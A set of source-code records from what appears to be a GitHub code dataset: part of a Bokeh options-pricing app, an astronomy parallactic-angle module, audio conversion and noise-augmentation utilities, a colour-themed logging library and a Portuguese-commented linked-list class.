qty_input[leg_nb].value\n if(leg_nb in leg_toggle.active and Q != 0):\n T = maturity_input[leg_nb].value\n K = strike_input[leg_nb].value\n asset_type = type_select[leg_nb].value\n\n T_int = max(T-T_delay, 0)\n res = assets[asset_type][\"payoff\"](sim[:, T], K)\n res_int = assets[asset_type][\"payoff\"](sim[:, T_int], K)\n\n unit_val = np.mean(res)\n monte_carlo_means[i] = np.mean(res)\n monte_carlo_std[i] = np.std(res)\n monte_carlo_nb[i] = len(res)\n\n unit_val_int = np.mean(res_int)\n\n if(T <= 0):\n unit_val = assets[asset_type][\"payoff\"](S, K)\n if(T_int <= 0):\n unit_val_int = assets[asset_type][\"payoff\"](S, K)\n\n current_value[i] += Q*unit_val\n int_value[i] += Q*unit_val_int\n\n # print(monte_carlo_means)\n # print(monte_carlo_std)\n # print(monte_carlo_nb)\n\n # GREEKS\n emp_greeks[0] = current_value[close_index]\n emp_greeks[1] = (current_value[close_index+1] - current_value[close_index-1])/(S[close_index+1]-S[close_index-1])\n emp_greeks[2] = (current_value[close_index+1] + current_value[close_index-1] - 2*current_value[close_index])/((S[close_index+1]-S[close_index])**2)\n emp_greeks[3] = (int_value[close_index]-current_value[close_index])/T_delay\n\n current_price = current_value[np.argmin(abs(S-S0))]\n curr_pnl = current_value-current_price\n matu_pnl = maturity_value-current_price\n int_pnl = int_value-current_price\n\n plot.x_range.start = 0.8*S0\n plot.x_range.end = 1.2*S0\n i_low, i_high = np.argmax(S > plot.x_range.start), np.argmin(S < plot.x_range.end)\n y_lowbound = min(np.min(current_value[i_low:i_high+1]), np.min(maturity_value[i_low:i_high+1]), np.min(int_value[i_low:i_high+1]))\n y_highbound = max(np.max(current_value[i_low:i_high+1]), np.max(maturity_value[i_low:i_high+1]), np.max(int_value[i_low:i_high+1]))\n if(y_highbound-y_lowbound > 0):\n plot.y_range.start = y_lowbound\n plot.y_range.end = y_highbound\n\n source.data = dict(x=S, curr=current_value, pnl_matu=maturity_value, pnl_int=int_value)\n display_source.data['th_value'] = np.round(th_greeks, 3)\n if(models[model_names[model_selection_input.active]]['resolution_method'].value != 'Analytical (recommended)'):\n display_source.data['th_value'] = ['N/A']*6\n display_source.data['emp_value'] = list(np.round(emp_greeks[:4], 3))+['Not computed']*2\n\nto_link = [curr_spot_input, int_delay_input]\nfor leg_nb in range(4):\n to_link += [type_select[leg_nb], qty_input[leg_nb], strike_input[leg_nb]]\nfor w in to_link:\n w.on_change('value', param_changed)\n\nleg_toggle.on_click(param_changed_mono)\nleg_toggle.on_click(update_UI_mono)\n\ninstant_recompute.on_click(update_UI_mono)\n\nask_recompute.on_click(recompute_asked)\n\nfor w in [int_delay_input]+[type_select[leg_nb] for leg_nb in range(4)]:\n w.on_change('value', update_UI)\n\n# Set up layouts and add to document\nleg_inputs = [column(qty_input[i], type_select[i], strike_input[i], maturity_input[i], sizing_mode=\"scale_both\") for i in range(4)]\ninputs = column(row(curr_spot_input, int_delay_input),\n column(leg_toggle, row(leg_inputs[0], leg_inputs[1], leg_inputs[2], leg_inputs[3])),\n row(ask_recompute, instant_recompute, recompute_delay),\n row(display_data_table), width=750)\n\ntab1 = Panel(child=row(inputs, plot), title='Overview')\n\nsource_underlying_example = ColumnDataSource(data=dict(T=[], S=[], sig=[]))\n\nexample_plot = figure(plot_height=400, plot_width=800, title=\"Underlying example path\", x_axis_label='Time', y_axis_label='Underlying price',\n tools=\"crosshair,save\",\n x_range=[0, 1], y_range=[90, 110], 
align='start')\n\nexample_plot.line('T', 'S', source=source_underlying_example, line_width=4, line_alpha=0.8, color=Spectral4[0])\n\nexample_vol_plot = figure(plot_height=250, plot_width=800, title=\"Underlying example volatility\", y_axis_label='Underlying volatility',\n tools=\"crosshair,save\",\n x_range=[0, 1], y_range=[0, 1], align='start')\n\nexample_vol_plot.line('T', 'sig', source=source_underlying_example, line_width=4, line_alpha=0.8, color=Spectral4[3])\n\nexample_plot.title.align = 'center'\nexample_plot.title.text_font_size = '20pt'\nexample_plot.xaxis.axis_label_text_font_size = \"20pt\"\nexample_plot.yaxis.axis_label_text_font_size = \"20pt\"\n\nexample_vol_plot.title.align = 'center'\nexample_vol_plot.title.text_font_size = '15pt'\nexample_vol_plot.yaxis.axis_label_text_font_size = \"15pt\"\n\nblocked_clear = False\n\n\ndef clear_display():\n global blocked_clear\n if(not blocked_clear):\n display_zone.text = ''\n\n\ndef clear_text_asked(attrname, old, new):\n clear_display()\n\n\ndef fit_from_file_asked(attrname, old, new):\n if(len(new)):\n fit_model_from_file()\n fit_from_file_button.value = ''\n fit_from_file_button.filename = ''\n\n\ndef fit_model_from_file():\n try:\n print('Reading file and parsing data...')\n data = base64.b64decode(fit_from_file_button.value)\n df = pd.read_csv(BytesIO(data), sep=',', parse_dates=True, infer_datetime_format=True)\n ic = min([i for i in range(len(df.columns)) if is_numeric_dtype(df.dtypes[i])])\n print(f\"First numerical column found is column #{ic} : {df.columns[ic]}\")\n index = df.iloc[:, ic].to_numpy()\n returns = index[1:]/index[:-1]\n dilated_log_returns = 100*np.log(returns)\n prms = []\n\n if(model_names[model_selection_input.active] == 'GARCH(1,1)'):\n model = arch_model(dilated_log_returns).fit(disp='off')\n display_zone.text = str(model.summary())\n prms = model.params.to_numpy()\n\n elif(model_names[model_selection_input.active] == 'GJR-GARCH(1,1)'):\n model = arch_model(dilated_log_returns, o=1).fit(disp='off')\n display_zone.text = str(model.summary())\n prms = model.params.to_numpy()\n prms[3], prms[4] = prms[4], prms[3]\n\n elif(model_names[model_selection_input.active] == 'Black-Scholes'):\n prms = [int(days_in_year_input.value)*np.mean(returns-1), np.sqrt(int(days_in_year_input.value))*np.std(returns)]\n display_zone.text = ''\n\n global blocked_recompute\n blocked_recompute = True\n\n for w, x in zip(models[model_names[model_selection_input.active]]['params_inputs'], prms):\n w.value = np.round(x, 6)\n\n blocked_recompute = False\n model_parameters_changed_mono('')\n curdoc().add_timeout_callback(clear_display, 15000)\n print(\"Done!\")\n\n except Exception as e:\n print(\"Model fiting critically failed:\"+str(e))\n\n\ndef model_parameters_changed_mono(new):\n redraw_example()\n param_changed_mono(new)\n\n\ndef model_parameters_changed(attrname, old, new):\n redraw_example()\n param_changed(attrname, old, new)\n\n\ndef redraw_example():\n # Generate the new curve\n N_points = 1000\n S0 = curr_spot_input.value\n\n T_max = max([maturity_input[leg_nb].value for leg_nb in range(4) if(leg_nb in leg_toggle.active)])\n Time = np.linspace(0, T_max, N_points+1)\n\n val, vol = models[model_names[model_selection_input.active]]['path']([x.value for x in models[model_names[model_selection_input.active]]['params_inputs']], S0, T_max, N_points)\n\n example_plot.x_range.start = 0\n example_plot.x_range.end = T_max\n example_plot.y_range.start = 0.99*np.min(val)\n example_plot.y_range.end = 1.01*np.max(val)\n\n 
example_vol_plot.x_range.start = 0\n example_vol_plot.x_range.end = T_max\n example_vol_plot.y_range.start = 0.99*np.min(vol)\n example_vol_plot.y_range.end = 1.01*np.max(vol)\n\n source_underlying_example.data = dict(T=Time, S=val, sig=vol)\n\ndays_in_year_input = Select(title=\"Days in year:\", options=['252', '365'], value='365', width=200)\ndays_in_year_input.on_change('value', model_parameters_changed)\n\nfor md in models:\n models[md]['params_inputs'] = []\n for nm, low_bound, high_bound, stepp, ini in models[md]['params']:\n models[md]['params_inputs'].append(Spinner(title=nm, low=low_bound, high=high_bound, step=stepp, value=ini, width=150))\n models[md]['params_inputs'][-1].on_change('value', model_parameters_changed)\n res_met = int(md == 'Black-Scholes')*['Analytical (recommended)']+['Monte-Carlo', 'Adaptive Monte-Carlo (experimental)']\n models[md]['resolution_method'] = Select(title=\"Resolution method:\", options=res_met, value=res_met[0], width=150)\n models[md]['resolution_method'].on_change('value', param_changed)\n\n\nmodel_selection_input = RadioButtonGroup(labels=model_names, active=0, width=600)\nmodel_selection_input.on_click(model_parameters_changed_mono)\n\nfit_desc = Div(text=\"\"\"

Fit model from file:

\"\"\", align='center')\nfit_from_file_button = FileInput(accept='.csv,.txt', align='center')\nfit_from_file_button.on_change('value', fit_from_file_asked)\n\ndisplay_zone = PreText(text=\"\"\"Default parameters are from CAC 40 returns\"\"\")\n\nfor w in [maturity_input[leg_nb] for leg_nb in range(4)]:\n w.on_change('value', model_parameters_changed)\n\ntab2 = Panel(child=row(column(days_in_year_input,\n model_selection_input,\n row(children=[column(children=[models[md]['resolution_method']]+models[md]['params_inputs']) for md in models]),\n row(fit_desc, fit_from_file_button, width=650),\n row(display_zone, width=650),\n width=650),\n column(example_plot, example_vol_plot)\n ), title='Underlying model')\n\ncurdoc().add_root(Tabs(tabs=[tab1, tab2]))\ncurdoc().title = \"Moulagator\"\nredraw_UI()\nredraw_example()\n","repo_name":"Come-B/multi_leg_pricer","sub_path":"PYTHON_PROJECT.py","file_name":"PYTHON_PROJECT.py","file_ext":"py","file_size_in_byte":25025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72154391527","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport math\n\n\ndef JD_to_LST(JDs, llong):\n \"\"\"Returns LST [frac. of day] using:\n JD - [iterable] - values of Julian data\n llong - local longitude [+/-degrees].\n \"\"\"\n\n LSTs = list()\n\n llong_h = llong / 15.\n\n for JD in list(JDs):\n\n D = JD - 2451545.0\n GMST = 18.697374558 + 24.06570982441908 * D\n GMST = GMST % 24\n\n if GMST < 0:\n GMST += 24.\n elif GMST >= 24.0:\n GMST -= 24.0\n\n LST = GMST + llong_h\n #convert to fraction of day\n LST = LST / 24.\n\n LSTs.append(LST)\n\n return LSTs\n\n\ndef LST_to_HA(LSTs, RA):\n \"\"\"\n RA [degrees] - right ascenction\n LST [fr. of days] - local sidireal time\n Returns Hour Angle [rads]\n \"\"\"\n\n HAs = list()\n\n RA_rad = RA * math.pi / 180.\n\n for LST in list(LSTs):\n HA = 2. 
def LST_to_HA(LSTs, RA):\n \"\"\"\n RA [degrees] - right ascension\n LST [fr. of days] - local sidereal time\n Returns Hour Angle [rads]\n \"\"\"\n\n HAs = list()\n\n RA_rad = RA * math.pi / 180.\n\n for LST in list(LSTs):\n HA = 2. * math.pi * LST - RA_rad\n HAs.append(HA)\n\n return HAs\n\n\ndef PA(JDs, ra, dec, latitude, longitude):\n \"\"\"Function returns parallactic angles of source (ra, dec) observed at\n moments of Julian Date JDs at geographic position (lat, llong) that is\n 'east' or 'west' of Greenwich.\n Parameters:\n JDs - [iterable] - set of Julian Dates,\n ra, dec - [float] - right ascension & declination of source,\n longitude, latitude - [float] - geographical longitude and latitude of\n the observer.\n \"\"\"\n\n PAs = list()\n\n LSTs = JD_to_LST(JDs, longitude)\n\n HAs = LST_to_HA(LSTs, ra)\n\n for HA in list(HAs):\n\n PA = math.atan2(math.sin(HA), (math.tan(latitude) * math.cos(dec) -\\\n math.sin(dec) * math.cos(HA)))\n PAs.append(PA)\n\n return PAs\n","repo_name":"akutkin/SACA","sub_path":"vlbi_errors/PA.py","file_name":"PA.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
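# --- Editor's note: hypothetical usage of the PA module above, illustration only. ---
# Observe the mixed units in PA(): ra is in degrees (LST_to_HA converts it),
# while dec and latitude feed math.sin/cos/tan directly, so they must already
# be in radians. "PA" as an import name is an assumption from the record's path.
import math
from PA import PA

angles = PA(JDs=[2451545.0], ra=0.0, dec=0.0,
            latitude=math.radians(48.0), longitude=0.0)
print(math.degrees(angles[0]))  # parallactic angle of the source, in degrees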
+{"seq_id":"22464667409","text":"from pydub import AudioSegment\nimport os\nfrom packages.LibrosaManager import LibrosaManager \nimport soundfile as sf\nimport librosa\nimport numpy as np\nimport random \nimport shutil\n\nclass AudioManager:\n\n def __init__(self) -> None:\n pass\n\n def convertAudioDirectory(self,\n audio_dir: str,\n input_format: str,\n output_format: str = '.wav',\n output_dir: str = None,\n delete_original: bool = False,\n bitrate: str = None,\n codec: str = None):\n\n for file in os.listdir(audio_dir):\n\n if input_format in file:\n self.convertAudioFileTypes(os.path.join(audio_dir, file), output_format=output_format, \n delete_original=delete_original, output_dir=output_dir,\n bitrate=bitrate, codec=codec)\n \n\n\n def convertAudioFileTypes(self, audio_path: str,\n output_format: str = '.wav',\n delete_original: bool = False,\n output_dir: str = None,\n output_file_name: str = None,\n bitrate: str = None,\n codec: str = None):\n \n assert output_format in ['.wav', '.mp4'], f'{output_format} is an invalid output format. Please enter types: (.wav, .mp4).' ## SB_COMMENT: maybe I am misunderstanding the error flow, but this doesn't get triggered with an incorrect input string\n \n try:\n import_audio = AudioSegment.from_file(audio_path)\n\n if isinstance(output_file_name, type(None)):\n output_file_name = os.path.basename(audio_path)\n output_file_name = output_file_name.replace(os.path.splitext(output_file_name)[1], output_format)\n\n if not output_dir:\n output_dir = os.path.dirname(audio_path)\n\n import_audio.export(os.path.join(output_dir, output_file_name),\n format=output_format.replace('.', ''),\n codec=codec,\n bitrate=bitrate)\n\n if delete_original:\n os.remove(audio_path)\n \n except Exception as e:\n print(f'Failed to Convert Audio File: {audio_path}')\n print('Error: ', e)\n\n def resampleAudioDirectory(self, input_directory: str, output_directory: str, target_sample_rate: int, replace_existing: bool = False):\n \n for file in os.listdir(input_directory):\n \n if os.path.splitext(file)[1] not in ['.wav', '.mp4', '.WAV']:\n continue\n \n if not replace_existing:\n if os.path.isfile(os.path.join(output_directory, file)):\n continue\n \n try:\n librosa_manager = LibrosaManager(os.path.join(input_directory, file))\n resampled_audio = librosa_manager.resample(target_sample_rate) ## SB_Comment - see librosa manager re: resampling\n sf.write(os.path.join(output_directory, file), resampled_audio, target_sample_rate, subtype='PCM_24')\n except Exception as e:\n print(f'Failed to Resample: {file}')\n print(f'Error Msg: {e}')\n print()\n \n \n def addNoiseWithSnr(self, audio_path: str, snr_range: list = [10, 80]):\n \n audio, sr = librosa.load(audio_path) ## SB_comment - again, loading without the native sample rate. Does this mean that even the resampled files are being re-resampled to 22050?!\n \n audio_power = np.mean(audio ** 2)\n \n noise_snr = random.randint(snr_range[0], snr_range[1])\n noise_power = audio_power / (10 ** (noise_snr / 10))\n noise = np.random.normal(scale=np.sqrt(noise_power)*100, size=len(audio))\n\n noisy_audio = audio + noise\n\n return noisy_audio, noise_snr, sr\n\n\n def launderAudioDirectory(self, input_dir: str, output_dir: str, noise_type: str = 'random_gaussian', replace_existing: bool = False, transcode_prob=0.5, noise_prob=0.5):\n\n full_launder_details = []\n\n # Loop through files \n for file in os.listdir(input_dir):\n\n #[is_transcode, bitrate, is_noise, snr]\n file_launder_details = [os.path.join(input_dir, file), 0, None, 0, None]\n\n\n #if not replace_existing:\n # if os.path.isfile(os.path.join(output_dir, file)):\n # continue\n\n try:\n # Assign random conditions\n # conditions = {'gaussian_noise':np.NaN, 'transcode':np.NaN, 'gaussian_noise_and_transcode':np.NaN, 'neither':np.NaN}\n # random_bools = [0 for item in range(len(conditions)-1)] + [1]\n # assignments = random.sample(random_bools, 4)\n\n # for i in range(len(conditions)):\n # key = list(conditions.keys())[i]\n # conditions[key] = assignments[i]\n\n # Apply random conditions\n # if 'gaussian_noise' in :\n # noisy_audio = add_noise_with_snr(audio_path=file)\n\n # sf.write(os.path.join(output_directory, file), noisy_audio, target_sample_rate, subtype='PCM_24')\n\n is_transcode = np.random.rand() <= transcode_prob\n is_noise = np.random.rand() <= noise_prob\n\n bitrate_options = ['64k', '127k', '196k']\n\n\n if is_transcode:\n\n bitrate = random.choice(bitrate_options)\n\n file_launder_details[1] = 1\n file_launder_details[2] = bitrate\n\n self.convertAudioFileTypes(os.path.join(input_dir, file), output_dir=output_dir,\n output_format='.mp4', 
delete_original=False, bitrate=bitrate,\n codec='aac'\n )\n\n self.convertAudioFileTypes(os.path.join(output_dir, file.replace('wav', 'mp4')), output_format='.wav', delete_original=True)\n\n else:\n # if no transcode is necessary, just move the file to the new directory\n shutil.copy(os.path.join(input_dir, file), os.path.join(output_dir, file))\n\n if is_noise:\n\n noisy_audio, noise_snr, sr = self.addNoiseWithSnr(os.path.join(output_dir, file))\n\n file_launder_details[3] = 1\n file_launder_details[4] = noise_snr\n\n\n #sf.write(os.path.join(output_dir, file), noisy_audio, target_sample_rate, subtype='PCM_24')\n sf.write(os.path.join(output_dir, file), noisy_audio, sr) # SB_Comment - again, care with SR\n\n full_launder_details.append(file_launder_details)\n\n except Exception as e:\n print(f'Failed to add noise: {file}')\n print(f'Error Msg: {e}')\n print()\n\n return full_launder_details\n","repo_name":"romitbarua/MultiModalDeepFake","sub_path":"packages/AudioManager.py","file_name":"AudioManager.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"23261351369","text":"#!/usr/bin/env python\n\n\"\"\"Log messages in different colours according to level.\nOutput can use 256 colours if the fabulous library is found.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport logging\nimport logging.handlers\nfrom datetime import datetime\nfrom importlib import import_module\n\ntry:\n\timport fabulous\n\t# Why not try these for more terminal tricks.\n\t# python -m fabulous.demo\n\t# python -m fabulous.image \n\t# python -m fabulous.text --skew=4 --shadow hello kitty\n\nexcept ImportError:\n\tfabulous = None\n\n# theme (module name from this directory) to use if not specified in init_log()\nDEFAULT_THEME = os.environ.get('THEMELOG_THEME', 'base16')\n\n# if THEMELOG_LIGHT is truthy we select a _light theme more suitable for terminals with\n# light backgrounds\nDEFAULT_LIGHT = False # os.environ.get('THEMELOG_LIGHT', '').zfill(1)[0].lower() in ('t', '1')\n\n# minimum log level to include\nDEFAULT_LOG_LEVEL = 'DEBUG'\n\n# date format\nDEFAULT_DATEFMT = '%Y-%m-%d %H:%M:%S'\n\n# message format used when a blank theme is selected or fabulous is not installed\n# or stderr is being redirected\nDEFAULT_MESSAGEFMT = '{r.asctime} {r.module} {r.levelname} {r.msg}'\n\n# default number of days to hold logfiles for if rotating logfiles are configured\nDEFAULT_ROTATING_COUNT = 90\n\n# allow environment variable to switch on debug startup messages\nDEFAULT_DEBUG_LOG = os.environ.get('THEMELOG_DEBUG', '').zfill(1)[0].lower() in ('t', '1')\n\n# list available themes\nSHOW_THEMES = os.environ.get('THEMELOG_SHOW_THEMES', '').zfill(1)[0].lower() in ('t', '1')\n\n\ndef get_messagefmt(theme, light=False, debug_log=False):\n\t\"\"\"Read messagefmt from modules in this directory.\n\tIf `light` is true we look for a module named theme_light.py instead of theme.py.\n\t\"\"\"\n\tif fabulous is None or theme is None or not sys.stdout.isatty():\n\t\t# no terminal colours\n\t\tif debug_log:\n\t\t\tif fabulous is None:\n\t\t\t\tprint('Disabling colour output because fabulous library not found')\n\n\t\t\telif theme is None:\n\t\t\t\tprint('Disabling colour output because chosen theme is null')\n\n\t\t\telse:\n\t\t\t\tprint('Disabling colour output because stdout is not a terminal')\n\n\t\treturn {None: DEFAULT_MESSAGEFMT}\n\n\telif theme == '8bit' or os.environ.get('INSIDE_EMACS') is not 
None:\n\t\tif debug_log:\n\t\t\tif theme == '8bit':\n\t\t\t\tprint('8-bit colour theme selected')\n\n\t\t\telse:\n\t\t\t\tprint('8-bit colour theme forced as we are inside emacs ansi-term')\n\n\t\t# an 8-bit colour theme. Forced if we are running inside an emacs ansi-term shell.\n\t\tfrom themelog.themes import eightbit\n\t\treturn eightbit.messagefmt\n\n\telse:\n\t\tif debug_log:\n\t\t\tprint('Selected theme {t}'.format(t=theme))\n\n\t\tmod = None\n\t\tbase = 'themelog.themes.{theme}'.format(theme=theme)\n\t\tif light:\n\t\t\tif debug_log:\n\t\t\t\tprint('Seeking light theme')\n\t\t\ttry:\n\t\t\t\tmod = import_module(base + '_light')\n\n\t\t\texcept ImportError:\n\t\t\t\tpass\n\n\t\tif mod is None:\n\t\t\ttry:\n\t\t\t\tmod = import_module(base)\n\n\t\t\texcept ImportError:\n\t\t\t\tprint('Cannot load module {base}'.format(base=base))\n\t\t\t\tshow_available_themes()\n\t\t\t\tprint('Disabling all color output')\n\t\t\t\treturn {None: DEFAULT_MESSAGEFMT}\n\n\t\treturn mod.messagefmt\n\n\nclass Formatter(object):\n\t\"\"\"Variation on logging.Formatter which uses different formats depending\n\ton the log level.\n\t\"\"\"\n\tdef __init__(self, messagefmt, datefmt):\n\t\tself.messagefmt = messagefmt\n\t\tself.datefmt = datefmt\n\n\tdef format(self, record):\n\t\t\"\"\"The following contents are available in the message:\n\n\t\t\tcreated 1374882991.29\n\t\t\texc_info None\n\t\t\texc_text None\n\t\t\tfilename env.py\n\t\t\tfuncName main\n\t\t\tlevelname DEBUG\n\t\t\tlevelno 10\n\t\t\tlineno 32\n\t\t\tmodule env\n\t\t\tmsecs 291.249990463\n\t\t\tmsg Hello I am debug message\n\t\t\tname root\n\t\t\tpathname /localhome/mje/Work/chart/chart/tools/env.py\n\t\t\tprocess 25037\n\t\t\tprocessName MainProcess\n\t\t\trelativeCreated 50.5659580231\n\t\t\tthread 139741536122624\n\t\t\tthreadName MainThread\n\n\t\tLevels:\n\t\t\tdebug\n\t\t\tinfo\n\t\t\twarning\n\t\t\terror\n\t\t\tcritical\n\n\t\t\"\"\"\n\t\t# expand the message part if needed\n\t\tif '%s' in record.msg:\n\t\t\trecord.msg = record.msg % record.args\n\n\t\t# look up the format string for this level\n\t\tmessagefmt = self.messagefmt.get(record.levelname)\n\t\tif messagefmt is None:\n\t\t\t# use None if we have nothing configured for this level\n\t\t\tmessagefmt = self.messagefmt[None]\n\n\t\t# format the message timestamp\n\t\trecord.asctime = datetime.fromtimestamp(\n\t\t\trecord.created).strftime(self.datefmt)\n\n\t\t# return the final assembled string\n\t\treturn messagefmt.format(r=record)\n\n\ndef show_available_themes():\n\t\"\"\"Display list of available themes to console.\n\tDo not use logging here because the logging system will not be ready yet.\n\t\"\"\"\n\tprint('Available themes:')\n\tfor filename in os.listdir(os.path.join(os.path.dirname(__file__), 'themes')):\n\t\tif filename == '__init__.py':\n\t\t\tcontinue\n\n\t\tprint(' {theme}'.format(theme=os.path.splitext(filename)[0]))\n\n\ndef init_log(theme=DEFAULT_THEME,\n\t\t\t light=None,\n\t\t\t level=DEFAULT_LOG_LEVEL,\n\t\t\t logfile=None,\n\t\t\t rotating_logfile=None,\n\t\t\t rotating_logfile_count=DEFAULT_ROTATING_COUNT,\n\t\t\t stdout=False,\n\t\t\t tz=None,\n\t\t\t datefmt=DEFAULT_DATEFMT,\n\t\t\t debug_log=DEFAULT_DEBUG_LOG,\n\t\t\t show_themes=SHOW_THEMES):\n\t\"\"\"Configure and initialise logging.\n\n\tArgs:\n\t\t`theme` (str): Name of the theme (a module from this directory) to try to use.\n\t\t`light` (bool): Attempt to load a theme suitable for light coloured terminal backgrounds.\n\t\t`level` (str): Minimum message level.\n\t\t`logfile` (str): Write to single output 
log file instead of terminal.\n\t\t`rotating_logfile` (str): Write to daily rotating log files.\n\t\t`stdout` (bool): Write terminal log to stdout instead of stderr.\n\t\t`tz` (str or false): Set timezone for the process. If `tz` is False then use UTC.\n\t\t`datefmt` (str): Date format.\n\t\t`debug_log` (bool): Print trace messages showing how the logging is initialised.\n\t\t`show_themes` (bool): Print a list of available themes.\n\t\"\"\"\n\n\tif debug_log:\n\t\tprint('Init of log')\n\n\tif show_themes:\n\t\tshow_available_themes()\n\n\t# Set timezone\n\tif tz is not None:\n\t\tinit_tz(tz)\n\n\tif light is None:\n\t\tlight = DEFAULT_LIGHT\n\n\t# check for valid log level\n\tlevels = ('DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL')\n\tif level not in levels:\n\t\traise ValueError('level of {bad} not allowed, select from {good}'.format(\n\t\t\t\tbad=level, good=', '.join(levels)))\n\n\t# we configure the top level root logger\n\tlogger = logging.getLogger()\n\tlogger.setLevel(level)\n\n\tif logfile is not None:\n\t\t# single log file\n\n\t\tif debug_log:\n\t\t\tprint('Writing log file to {path}'.format(path=logfile))\n\n\t\tfilehandler = logging.FileHandler(logfile)\n\t\tfilehandler.setFormatter(Formatter({None: DEFAULT_MESSAGEFMT},\n\t\t\t\t\t\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(filehandler)\n\n\telif rotating_logfile is not None:\n\t\t# rotating log file\n\n\t\tif debug_log:\n\t\t\tprint('Writing rotating log file to {path}'.format(path=rotating_logfile))\n\n\t\tfilehandler = logging.handlers.TimedRotatingFileHandler(\n\t\t\tfilename=rotating_logfile,\n\t\t\twhen='midnight',\n\t\t\tbackupCount=rotating_logfile_count,\n\t\t\tutc=tz is False)\n\t\tfilehandler.setFormatter(Formatter({None: DEFAULT_MESSAGEFMT},\n\t\t\t\t\t\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(filehandler)\n\n\telse:\n\t\t# terminal\n\n\t\tif debug_log:\n\t\t\tprint('Logging to terminal')\n\n\t\tif stdout:\n\t\t\tstreamhandler = logging.StreamHandler(sys.stdout)\n\n\t\telse:\n\t\t\tstreamhandler = logging.StreamHandler(sys.stderr)\n\n\t\tstreamhandler.setFormatter(\n\t\t\tFormatter(get_messagefmt(theme, light, debug_log),\n\t\t\t\t\t datefmt))\n\t\tlogger.addHandler(streamhandler)\n\n\t# prevent doubling up of messages\n\tlogger.propagate = False\n\n\ndef init_tz(tz):\n\t\"\"\"Set the time zone used for log timestamps (UTC if tz is False).\n\t\"\"\"\n\tif tz is False:\n\t\tos.environ['TZ'] = 'UTC' # required for scheduler and worker log timestamps\n\n\telse:\n\t\tos.environ['TZ'] = tz\n\n\ttime.tzset()\n","repo_name":"mjem/themelog","sub_path":"themelog/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
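# --- Editor's note: hypothetical usage of the themelog module above, illustration only. ---
# init_log() wires a themed Formatter onto the root logger; afterwards ordinary
# logging calls pick up the per-level colour formats. The import path follows
# the record's sub_path (themelog/log.py); 'base16' is its DEFAULT_THEME.
import logging
from themelog.log import init_log

init_log(theme='base16', level='INFO')
logging.info('hello from a themed logger')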
+{"seq_id":"70180284649","text":"from pokenode import PokeNode\n\n#List modified to accept only PokeNode items\n\nclass List:\n\n def __init__(self):\n\n self.__head = None\n\n \n def add(self, *item):\n\n '''Adds an item at index 0 of the list'''\n\n temp = PokeNode(*item)\n temp.set_next(self.__head)\n self.__head = temp\n\n\n def remove(self, item):\n\n ''' Removes the first occurrence of the item from the list.'''\n\n current = self.__head\n previous = None\n\n #Is the list empty?\n if current == None:\n print(\"There are no items in this list.\")\n #The removed item is the first in the list\n elif current.get_data() == item:\n self.__head = current.get_next()\n #The removed item is not the first element\n else:\n #Walk to it\n while current.get_data() != item:\n previous, current = current, current.get_next()\n previous.set_next(current.get_next())\n\n def size(self):\n\n '''Returns the number of items in the list (length)'''\n\n count = 0\n current = self.__head\n while current != None:\n count += 1\n current = current.get_next()\n\n return count\n\n def search(self, item):\n\n '''Returns True if the list contains the element'''\n\n current = self.__head\n while current != None:\n if current.get_data() != item:\n current = current.get_next()\n else:\n return True\n\n return False\n\n def is_empty(self):\n\n '''Checks whether the list is empty. Returns True if so.'''\n\n return self.__head == None\n\n def append(self, *item):\n\n '''Adds an item at the last position of the list'''\n\n current = self.__head\n temp = PokeNode(*item)\n #The list is empty\n if current == None:\n self.__head = temp\n #The list is not empty\n else:\n while current.get_next() != None:\n current = current.get_next()\n current.set_next(temp)\n \n\n def index(self, item):\n\n '''Returns the index of the element in the list. Returns -1 if the list does not contain it'''\n\n count = 0\n current = self.__head\n try:\n while current.get_data() != item:\n current = current.get_next()\n count += 1\n return count\n except:\n return -1\n\n def insert(self, pos, *item):\n \n '''Adds an item at index \"pos\"\n If pos >= the list length, appends at the end'''\n\n current = self.__head\n previous = None\n temp = PokeNode(*item)\n count = 0\n\n #Empty list\n if self.is_empty():\n self.__head = temp\n #Other cases\n else:\n try:\n #Pos 0\n if pos == 0:\n temp.set_next(current)\n self.__head = temp\n #Pos > 0 <= len\n else: \n #Walk up to the last index of the list \n while count != pos:\n previous, current = current, current.get_next()\n count += 1\n temp.set_next(current)\n previous.set_next(temp)\n #Raises when current is None (None.get_next()), i.e. pos > len\n except:\n temp.set_next(current)\n previous.set_next(temp)\n \n #TODO\n # def pop(self, pos = None):\n \n # '''Removes the last item of the list.\n # Can take a specific index.'''\n\n # current = self.__head\n # previous = None\n # popped = None\n\n # try:\n # \n # except:\n # return \"The list is empty\"\n\n # return popped\n \n def __str__(self):\n \n '''Prints the list just like a Python list, []'''\n\n current = self.__head\n lista_string = \"[ \"\n\n #Is the list empty?\n if self.is_empty():\n return lista_string + \"]\"\n #Add the list items\n while current != None:\n if current.get_next() == None:\n return lista_string + \"{} ]\".format(str(current.get_data()))\n lista_string += \"{}, \".format(str(current.get_data()))\n current = current.get_next()\n ","repo_name":"Arushidesu/projeto-ed-pokemon","sub_path":"lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
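# --- Editor's note: hypothetical usage of the List class above, illustration only. ---
# Assumes PokeNode(*item) stores the payload and renders it via get_data();
# the import name mirrors the record's file name lista.py.
from lista import List

pokes = List()
pokes.add(25, 'Pikachu')     # prepend at index 0
pokes.append(7, 'Squirtle')  # append at the tail
print(pokes.size())          # 2
print(pokes)                 # [ <data of each PokeNode> ]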
